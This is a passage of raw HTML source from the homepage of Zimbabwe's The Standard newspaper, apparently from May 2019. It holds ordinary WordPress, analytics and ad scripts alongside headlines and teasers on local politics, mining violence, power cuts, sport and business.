src='https://www.thestandard.co.zw/wp-content/plugins/woodojo/bundled/woodojo-tabs/assets/js/functions.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/themes/canvas/includes/js/third-party.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/themes/canvas/includes/js/modernizr.js?ver=2.6.2'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/themes/thestandard-child/js/swipe.min.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/themes/canvas/includes/js/general.js?ver=4.8.9'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/swfobject.js?ver=2.2-20120417'></script> <!-- Adjust the website width --> <style type="text/css"> .col-full, #wrapper { max-width: 1000px !important; } </style> <link rel='https://api.w.org/' href='https://www.thestandard.co.zw/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.thestandard.co.zw/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.thestandard.co.zw/wp-includes/wlwmanifest.xml" /> <!-- This site is using AdRotate v4.6.2 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ --> <!-- AdRotate CSS --> <style type="text/css" media="screen"> .g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; } .g img { height:auto; } .g-col { position:relative; float:left; } .g-col:first-child { margin-left: 0; } .g-col:last-child { margin-right: 0; } .g-2 { margin:0px;width:100%; max-width:300px; height:100%; max-height:300px; } .g-3 { margin:0px;width:100%; max-width:300px; height:100%; max-height:600px; } .g-4 { margin:0px;width:100%; max-width:768px; height:100%; max-height:90px; } .g-5 { margin:0px;width:100%; max-width:500px; height:100%; max-height:90px; } .g-6 { margin:0px;width:100%; max-width:500px; height:100%; max-height:90px; } @media only screen and (max-width: 480px) { .g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; } } </style> <!-- /AdRotate CSS --> <!-- Options Panel Custom CSS --> <style type="text/css"> body .sd-social-icon .sd-content li.share-custom a span, body .sd-social-icon-text .sd-content li.share-custom a span, body .sd-social-text .sd-content li.share-custom a span, body .sd-social-official .sd-content li.share-custom a span, body .sd-content ul li.share-custom a.share-icon span { background-size: 11px 11px !important; } </style> <!-- Woo Shortcodes CSS --> <link href="https://www.thestandard.co.zw/wp-content/themes/canvas/functions/css/shortcodes.css" rel="stylesheet" type="text/css" /> <!-- Theme version --> <meta name="generator" content="The Zimbabwe Independent Child Theme 2.0" /> <meta name="generator" content="Canvas 5.5.3" /> <meta name="generator" content="WooFramework 6.2.6" /> <!-- Google Webfonts --> <link href="https://fonts.googleapis.com/css?family=PT+Serif%3Aregular%2C%3Aitalic%2C%3A700%2C%3A700italic" rel="stylesheet" type="text/css" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-33262148-2', 'auto'); ga('send', 'pageview'); </script></head> <body class="home blog ie7 ie alt-style-default boxed-layout two-col-left width-1000 two-col-left-1000"> <script type="text/javascript"> (function() { var em = document.createElement('script'); em.type = 'text/javascript'; em.async = true; em.src = ('https:' == document.location.protocol ? 'https://za-ssl' : 'http://za-cdn') + '.effectivemeasure.net/em.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(em, s); })(); </script> <noscript> <img src="//za.effectivemeasure.net/em_image" alt="" style="position:absolute; left:-5px;" /> </noscript> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-33262148-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <div id="top"> <div class="col-full"> <h3 class="top-menu">Top Menu</h3><ul id="top-nav" class="nav top-navigation fl"><li id="menu-item-56363" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56363"><a href="https://www.thestandard.co.zw/about-us/">About us</a></li> <li id="menu-item-56361" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56361"><a href="https://www.thestandard.co.zw/advertise/">Advertise</a></li> <li id="menu-item-56364" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56364"><a href="https://www.thestandard.co.zw/subscribe/">Subscribe</a></li> <li id="menu-item-78531" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-78531"><a href="https://www.thestandard.co.zw/family/">Family</a></li> <li id="menu-item-56362" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56362"><a href="https://www.thestandard.co.zw/contact-us/">Contact us</a></li> </ul> </div> </div><!-- /#top --> <div id="wrapper"> <div id="inner-wrapper"> <!-- Error, Ad is not available at this time due to schedule/geolocation restrictions! --> <br/> <div> <div style="display:inline-block; width: 49%; "><!-- Either there are no banners, they are disabled or none qualified for this location! --></div> <div style="display:inline-block; width: 49%; float:right;"><!-- Either there are no banners, they are disabled or none qualified for this location! --></div> </div> <p/> <br/> <h3 class="nav-toggle icon"><a href="#navigation">Navigation</a></h3> <header id="header" class="col-full"> <div id="logo"> <a href="https://www.thestandard.co.zw/" title="Zimbabwe&#039;s Leading Sunday Newspaper"><img src="https://www.thestandard.co.zw/wp-content/uploads/2014/06/Standard-Logo1.jpg" alt="The Standard" /></a> </div> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({article:'auto'}); !function (e, f, u, i) { if (!document.getElementById(i)){ e.async = 1; e.src = u; e.id = i; f.parentNode.insertBefore(e, f); } }(document.createElement('script'), document.getElementsByTagName('script')[0], '//cdn.taboola.com/libtrc/alphamediaholdings-thestandard/loader.js', 'tb_loader_script'); if(window.performance && typeof window.performance.mark == 'function') {window.performance.mark('tbl_ic');} </script> <div class="social-search"> <form method="get" class="searchform" action="https://www.thestandard.co.zw/" > <input type="text" class="field s" name="s" value="Search..." onfocus="if (this.value == 'Search...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search...';}" /> <input type="image" src="https://www.thestandard.co.zw/wp-content/themes/canvas/images/ico-search.png" alt="Search" class="submit" name="submit" /> </form> <a class="facebook" href="http://www.facebook.com/pages/The-Standard-Newspaper/103305193039107"></a> <a class="twitter" href="https://twitter.com/thestandardzim"></a> <a class="rss" href="https://www.thestandard.co.zw/feed/"></a> </div> <div class="fix"></div> </header> <nav id="navigation" class="col-full" role="navigation"> <section class="menus"> <a href="https://www.thestandard.co.zw" class="nav-home"><span>Home</span></a> <h3>Primary Menu</h3><ul id="main-nav" class="nav fl"><li id="menu-item-55515" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-55515"><a href="http://www.thestandard.co.zw/">Home</a></li> <li id="menu-item-53580" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53580"><a href="https://www.thestandard.co.zw/local-zimbabwe-stories/">Local News</a></li> <li id="menu-item-79585" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79585"><a href="https://www.thestandard.co.zw/entertainment/">Entertainment</a></li> <li id="menu-item-79687" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79687"><a href="https://www.thestandard.co.zw/sports/">Sport</a></li> <li id="menu-item-53584" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53584"><a href="https://www.thestandard.co.zw/opinion/">Opinion</a></li> <li id="menu-item-53585" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53585"><a href="https://www.thestandard.co.zw/editorial/">Editorial</a></li> <li id="menu-item-210006720925719" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-210006720925719"><a href="https://www.thestandard.co.zw/standard-style/">Standard Style</a></li> <li id="menu-item-210006720933880" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-210006720933880"><a href="http://www.myclassifieds.co.zw">MyClassifieds</a></li> </ul> </section><!-- /.menus --> <a href="#top" class="nav-close"><span>Return to Content</span></a> </nav> <br/><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- thestandard_responsive_text_link --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5185228015030174" data-ad-slot="5703318064" data-ad-format="link"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <!-- #content Starts --> <div id="content" class="col-full"> <div id="main-sidebar-container"> <!-- #main Starts --> <!-- SLIDER --> <div class="slider"> <div class="slider-wrapper"> <div id='slider' class='swipe'> <ul> <li> <div class="container"> <div class="content"> <h1><a href="https://www.thestandard.co.zw/2019/05/12/vps-mega-salaries-exposed/">VPs’ mega salaries exposed</a></h1> <p><p>Zimbabwe’s two vice-presidents earn a staggering $14 000 a month each at a time the government is struggling to pay civil servants a living wage, it has been revealed.</p> </p> </div> <a href="https://www.thestandard.co.zw/2019/05/12/vps-mega-salaries-exposed/"><img width="600" height="400" src="https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi......jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi......jpg 600w, https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi.....-300x200.jpg 300w, https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi.....-100x67.jpg 100w, https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi.....-200x133.jpg 200w" sizes="(max-width: 600px) 100vw, 600px" /></a> </div> </li> <li> <div class="container"> <div class="content"> <h1><a href="https://www.thestandard.co.zw/2019/05/12/jah-prayzah-rebranding-pays-off/">Jah Prayzah rebranding pays off</a></h1> <p><p>The choice to ditch anything associated with the country’s army of late appears to be paying off for musician Jah Prayzah, whose ship is steering back to the hearts of [&hellip;]</p> </p> </div> <a href="https://www.thestandard.co.zw/2019/05/12/jah-prayzah-rebranding-pays-off/"><img width="600" height="400" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Jah-Prayzah.gif" class="attachment-full size-full wp-post-image" alt="" /></a> </div> </li> <li> <div class="container"> <div class="content"> <h1><a href="https://www.thestandard.co.zw/2019/05/12/old-mutual-boss-step/">Old Mutual boss to step down</a></h1> <p><p>Old Mutual Zimbabwe group chief executive Jonas Mushosho, is set to leave the financial services giant before year end, at a time the firm is restructuring and bundling up its [&hellip;]</p> </p> </div> <a href="https://www.thestandard.co.zw/2019/05/12/old-mutual-boss-step/"><img width="602" height="400" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/jonas-mushosho.gif" class="attachment-full size-full wp-post-image" alt="" /></a> </div> </li> <li> <div class="container"> <div class="content"> <h1><a href="https://www.thestandard.co.zw/2019/05/12/mayhem-at-bosso/">Mayhem at Bosso</a></h1> <p><p>The highly-anticipated Bulawayo derby pitting Chicken Inn and struggling Highlanders FC had to endure a 20-minute stoppage after scenes of violence from Bosso supporters protesting against Clive Augusto’s goal, which [&hellip;]</p> </p> </div> <a href="https://www.thestandard.co.zw/2019/05/12/mayhem-at-bosso/"><img width="516" height="320" src="https://www.thestandard.co.zw/wp-content/uploads/2018/02/madinda-ndlovu.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2018/02/madinda-ndlovu.jpg 516w, https://www.thestandard.co.zw/wp-content/uploads/2018/02/madinda-ndlovu-300x186.jpg 300w, https://www.thestandard.co.zw/wp-content/uploads/2018/02/madinda-ndlovu-100x62.jpg 100w, https://www.thestandard.co.zw/wp-content/uploads/2018/02/madinda-ndlovu-200x124.jpg 200w" sizes="(max-width: 516px) 100vw, 516px" /></a> </div> </li> <li> <div class="container"> <div class="content"> <h1><a href="https://www.thestandard.co.zw/2019/05/12/mat-south-gold-wars-turn-bloody-gangs-rampage/">Mat South gold wars turn bloody as gangs rampage</a></h1> <p><p>Avigilant Masotsha considers himself lucky to be alive.</p> </p> </div> <a href="https://www.thestandard.co.zw/2019/05/12/mat-south-gold-wars-turn-bloody-gangs-rampage/"><img width="600" height="400" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Nugget-Mine-Accident-KB-Mpofu-19.gif" class="attachment-full size-full wp-post-image" alt="" /></a> </div> </li> </ul> </div> <div class="slider-nav"> <a class="prev fl" href='#' onclick='slider.prev();return false;'></a> <a class="next fr" href='#' onclick='slider.next();return false;'></a> <div class="fix"></div> <div class="mobile-fix"></div> </div> </div> <script> var slider = new Swipe(document.getElementById('slider'), { auto: 5000, speed: 1100 }); </script> </div> <!-- ENTERTAINMENT --> <div class="featured-single first"> <h4><a href="https://www.thestandard.co.zw/entertainment/">Life & Style</a></h4> <a href="https://www.thestandard.co.zw/2019/05/13/noble-stylz-takes-dig-govt/"><img width="300" height="240" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/noble-1-1-300x240.gif" class="attachment-featured-single size-featured-single wp-post-image" alt="" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/13/noble-stylz-takes-dig-govt/" rel="bookmark" title="Permanent Link to Noble Stylz takes a dig at govt, again">Noble Stylz takes a dig at govt, again</a></h5> <div class="fix"></div> </div> <!-- <div class="fix"></div> --> <!-- NEWS --> <div class="featured-single"> <h4><a href="https://www.thestandard.co.zw/news/">News</a></h4> <a href="https://www.thestandard.co.zw/2019/05/12/illegal-miners-defy-soldiers-gaika-mine/"><img width="300" height="240" src="https://www.thestandard.co.zw/wp-content/uploads/2019/04/Gold-panners-300x240.jpg" class="attachment-featured-single size-featured-single wp-post-image" alt="" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/illegal-miners-defy-soldiers-gaika-mine/" rel="bookmark" title="Permanent Link to Illegal miners defy soldiers at Gaika mine">Illegal miners defy soldiers at Gaika mine</a></h5> <div class="fix"></div> </div> <section class="cat-singles"> <!-- INTERNATIONAL --> <div class="cat-single"> <h4><a href="https://www.thestandard.co.zw/international/">International</a></h4> <h5><a href="https://www.thestandard.co.zw/2019/05/02/women-girls-preyed-spoils-war/" rel="bookmark" title="Permanent Link to Women, girls ‘preyed on as the spoils of war’">Women, girls ‘preyed on as the spoils of war’</a></h5> <p>“They forcefully took us away and kept us like prisoners,” Lydia Musa, a former Boko Haram captive who was abducted at the age of 14 during an attack on her [&hellip;]</p> <a class="read-more" href="https://www.thestandard.co.zw/2019/05/02/women-girls-preyed-spoils-war/">Read the full post</a> <div class="fix"></div> </div> <!-- BUSINESS --> <div class="cat-single"> <h4><a href="https://www.thestandard.co.zw/zimbabwe-business-stories/">Business</a></h4> <h5><a href="https://www.thestandard.co.zw/2019/05/15/chaka-chaya-neecocash-promotion-back-bigger/" rel="bookmark" title="Permanent Link to ‘Chaka-Chaya neEcoCash’ promotion back and bigger">‘Chaka-Chaya neEcoCash’ promotion back and bigger</a></h5> <p>The multi million dollar ‘ChakaChaya neEcoCash’ promotion is back.</p> <a class="read-more" href="https://www.thestandard.co.zw/2019/05/15/chaka-chaya-neecocash-promotion-back-bigger/">Read the full post</a> <div class="fix"></div> </div> <!-- POLITICS --> <div class="cat-single last"> <h4><a href="https://www.thestandard.co.zw/politics/">Politics</a></h4> <h5><a href="https://www.thestandard.co.zw/2019/05/12/want-chamisa-talks-khupe/" rel="bookmark" title="Permanent Link to I want Chamisa talks: Khupe">I want Chamisa talks: Khupe</a></h5> <p>The succession battle following founding MDC leader Morgan Tsvangirai&#8217;s death in February 2018 took an intriguing turn last week after the High Court ruled that Nelson Chamisa is not the [&hellip;]</p> <a class="read-more" href="https://www.thestandard.co.zw/2019/05/12/want-chamisa-talks-khupe/">Read the full post</a> <div class="fix"></div> </div> </section> <div class="line"></div> <section id="main" class="col-left"> <br/> <script type="text/javascript"><!-- google_ad_client = "ca-pub-3786607324213394"; /* ST_Homepage */ google_ad_slot = "8121047080"; google_ad_width = 660; google_ad_height = 90; //--> </script> <script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js"> </script> <!-- SPORTS --> <div class="cat-main"> <div class="block-header"> <h4 class="fl"><a href="https://www.thestandard.co.zw/sports/">Sport</a></h4> <a class="fr" href="https://www.thestandard.co.zw/sports/">View more</a> <div class="fix"></div> </div> <div class="featured"> <h6>Featured Article</h6> <h5><a href="https://www.thestandard.co.zw/2019/05/13/fuz-donates-cyclone-idai-victims/" rel="bookmark" title="Permanent Link to FUZ donates to Cyclone Idai victims">FUZ donates to Cyclone Idai victims</a></h5> <a href="https://www.thestandard.co.zw/2019/05/13/fuz-donates-cyclone-idai-victims/"><img width="150" height="150" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Footballers-Union-150x150.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Footballers-Union-150x150.gif 150w, https://www.thestandard.co.zw/wp-content/uploads/2019/05/Footballers-Union-50x50.gif 50w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>The Footballers&#8217; Union of Zimbabwe (FUZ) has partnered the Zimbabwe Red Cross Society (ZRCS) in responding to Cyclone Idai disaster, which recently left a trail of destruction in Mozambique, Malawi [&hellip;]</p> <a href="https://www.thestandard.co.zw/2019/05/13/fuz-donates-cyclone-idai-victims/" class="read-more">Read More</a> <div class="fix"></div> </div> <ul class="sub"> <h6>Popular Articles</h6> <li> <a href="https://www.thestandard.co.zw/2019/05/12/musonas-afcon-birthday-wish/" rel="bookmark" title="Permanent Link to Musona’s Afcon birthday wish">Musona’s Afcon birthday wish</a> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/mayhem-at-bosso/" rel="bookmark" title="Permanent Link to Mayhem at Bosso">Mayhem at Bosso</a> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/peggson-wins-2019-castle-tankard/" rel="bookmark" title="Permanent Link to Peggson wins 2019 Castle Tankard">Peggson wins 2019 Castle Tankard</a> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/gems-get-sa-netball-league-invite/" rel="bookmark" title="Permanent Link to Gems get SA Netball League invite">Gems get SA Netball League invite</a> <div class="fix"></div> </li> </ul> </div> <div class="line"></div> <!-- INTERNATIONAL --> <div class="cat-main"> <div class="block-header"> <h4 class="fl"><a href="https://www.thestandard.co.zw/international/">International</a></h4> <a class="fr" href="https://www.thestandard.co.zw/international/">View more</a> <div class="fix"></div> </div> <div class="featured"> <h6>Featured Article</h6> <h5><a href="https://www.thestandard.co.zw/2019/05/02/women-girls-preyed-spoils-war/" rel="bookmark" title="Permanent Link to Women, girls ‘preyed on as the spoils of war’">Women, girls ‘preyed on as the spoils of war’</a></h5> <a href="https://www.thestandard.co.zw/2019/05/02/women-girls-preyed-spoils-war/"><img width="150" height="150" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Feature-pic-150x150.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Feature-pic-150x150.gif 150w, https://www.thestandard.co.zw/wp-content/uploads/2019/05/Feature-pic-50x50.gif 50w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>“They forcefully took us away and kept us like prisoners,” Lydia Musa, a former Boko Haram captive who was abducted at the age of 14 during an attack on her [&hellip;]</p> <a href="https://www.thestandard.co.zw/2019/05/02/women-girls-preyed-spoils-war/" class="read-more">Read More</a> <div class="fix"></div> </div> <ul class="sub"> <h6>Popular Articles</h6> <li> <a href="https://www.thestandard.co.zw/2019/05/02/julian-assange-doesnt-consent-us-extradition-court-hears/" rel="bookmark" title="Permanent Link to Julian Assange doesn&#8217;t consent to US extradition, court hears">Julian Assange doesn&#8217;t consent to US extradition, court hears</a> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/02/syria-not-dumping-ground-terrorists/" rel="bookmark" title="Permanent Link to Syria should not be a dumping ground for terrorists">Syria should not be a dumping ground for terrorists</a> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/02/uss-history-sanctions-worldwide-zimbabwe-affected/" rel="bookmark" title="Permanent Link to US’s history of sanctions worldwide and how Zimbabwe is affected">US’s history of sanctions worldwide and how Zimbabwe is affected</a> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/02/us-no-intent-keep-inf-treaty-2/" rel="bookmark" title="Permanent Link to US has no intent to keep the INF treaty">US has no intent to keep the INF treaty</a> <div class="fix"></div> </li> </ul> </div> <div class="line"></div> <!-- LOCAL --> <div class="cat-posts fl"> <div class="block-header"> <h4 class="fl"><a href="https://www.thestandard.co.zw/politics/">Local</a></h4> <a class="fr" href="https://www.thestandard.co.zw/politics/">View more</a> <div class="fix"></div> </div> <ul> <li> <a href="https://www.thestandard.co.zw/2019/05/12/war-vets-act-gukurahundi/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2016/01/gukurahundi1-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2016/01/gukurahundi1-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2016/01/gukurahundi1-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/war-vets-act-gukurahundi/" rel="bookmark" title="Permanent Link to War vets act on Gukurahundi">War vets act on Gukurahundi</a></h5> <p>Zpra war veterans have established a committee on Gukurahundi to address issues specific to them after indications the government is now ready to address the 1980s killings.</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/vps-mega-salaries-exposed/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi.....-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi.....-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2018/09/kembo-mohadi.....-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/vps-mega-salaries-exposed/" rel="bookmark" title="Permanent Link to VPs’ mega salaries exposed">VPs’ mega salaries exposed</a></h5> <p>Zimbabwe’s two vice-presidents earn a staggering $14 000 a month each at a time the government is struggling to pay civil servants a living wage, it has been revealed.</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/buyers-stampede-mugabe-property/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2017/05/President-Mugabe-gave-a-speech-at-the-burial-of-the-late-Justice-Chidyausiku-yesterday-at-the-National-Heroes-arce-Pic-Shepherd-Tozvireva-50x50.gif" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2017/05/President-Mugabe-gave-a-speech-at-the-burial-of-the-late-Justice-Chidyausiku-yesterday-at-the-National-Heroes-arce-Pic-Shepherd-Tozvireva-50x50.gif 50w, https://www.thestandard.co.zw/wp-content/uploads/2017/05/President-Mugabe-gave-a-speech-at-the-burial-of-the-late-Justice-Chidyausiku-yesterday-at-the-National-Heroes-arce-Pic-Shepherd-Tozvireva-150x150.gif 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/buyers-stampede-mugabe-property/" rel="bookmark" title="Permanent Link to Buyers stampede for Mugabe property">Buyers stampede for Mugabe property</a></h5> <p>Bargain hunters yesterday morning thronged former president Robert Mugabe’s dairy farm to buy equipment and other farming implements at a private auction.</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/outrage-zesa-load-shedding/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2012/11/ZESA-megawatt-house-cues1-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2012/11/ZESA-megawatt-house-cues1-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2012/11/ZESA-megawatt-house-cues1-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/outrage-zesa-load-shedding/" rel="bookmark" title="Permanent Link to Outrage over Zesa ‘load-shedding’">Outrage over Zesa ‘load-shedding’</a></h5> <p>ROLLING power cuts have intensified across the country despite repeated denials by Zesa that it has re-introduced load-shedding.</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/cattle-rustlers-terrorise-villagers/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2018/02/Cattle-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2018/02/Cattle-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2018/02/Cattle-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/cattle-rustlers-terrorise-villagers/" rel="bookmark" title="Permanent Link to Cattle rustlers terrorise villagers">Cattle rustlers terrorise villagers</a></h5> <p>VILLAGERS from Zezani, Makhado, Madzivhe and Siyoka areas of Beitbridge West have lost more than 600 cattle worth about US$600 000 (RTGS 2 100 000) to a syndicate they are [&hellip;]</p> <div class="fix"></div> </li> </ul> </div> <!-- BUSINESS --> <div class="cat-posts fr"> <div class="block-header"> <h4 class="fl"><a href="https://www.thestandard.co.zw/zimbabwe-business-stories/">Business</a></h4> <a class="fr" href="https://www.thestandard.co.zw/zimbabwe-business-stories/">View more</a> <div class="fix"></div> </div> <ul> <li> <a href="https://www.thestandard.co.zw/2019/05/15/chaka-chaya-neecocash-promotion-back-bigger/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Mr-Eddie-Chibi--50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Mr-Eddie-Chibi--50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/05/Mr-Eddie-Chibi--150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/15/chaka-chaya-neecocash-promotion-back-bigger/" rel="bookmark" title="Permanent Link to ‘Chaka-Chaya neEcoCash’ promotion back and bigger">‘Chaka-Chaya neEcoCash’ promotion back and bigger</a></h5> <p>The multi million dollar ‘ChakaChaya neEcoCash’ promotion is back.</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/old-mutual-boss-step/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/jonas-mushosho-50x50.gif" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/05/jonas-mushosho-50x50.gif 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/05/jonas-mushosho-150x150.gif 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/old-mutual-boss-step/" rel="bookmark" title="Permanent Link to Old Mutual boss to step down">Old Mutual boss to step down</a></h5> <p>Old Mutual Zimbabwe group chief executive Jonas Mushosho, is set to leave the financial services giant before year end, at a time the firm is restructuring and bundling up its [&hellip;]</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/12/fidelity-narrows-losses-us600k/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/fungayi-50x50.gif" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/05/fungayi-50x50.gif 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/05/fungayi-150x150.gif 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/fidelity-narrows-losses-us600k/" rel="bookmark" title="Permanent Link to Fidelity narrows losses to US$600k">Fidelity narrows losses to US$600k</a></h5> <p>ZIMBABWE Stock Exchange-listed Fidelity Life Assurance narrowed its after-tax loss by 52% to US$0,6 million in the year ended December 31, 2018 from US$1,3 million in 2017.</p> <div class="fix"></div> </li> </ul> <br/> <script type="text/javascript"><!-- google_ad_client = "ca-pub-3786607324213394"; /* ST_Homepage */ google_ad_slot = "8121047080"; google_ad_width = 300; google_ad_height = 250; //--> </script> <script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </div> <div class="line"></div> <!-- CARTOONS --> <div class="cat-posts fl"> <div class="block-header"> <h4 class="fl"><a href="https://www.thestandard.co.zw/cartoons/">Cartoons</a></h4> <a class="fr" href="https://www.thestandard.co.zw/cartoons/">View more</a> <div class="fix"></div> </div> <ul> <li> <a href="https://www.thestandard.co.zw/2019/04/21/standard-cartoon-21-04-19/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/04/cartoon-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/04/cartoon-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/04/cartoon-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/04/21/standard-cartoon-21-04-19/" rel="bookmark" title="Permanent Link to Standard Cartoon 21 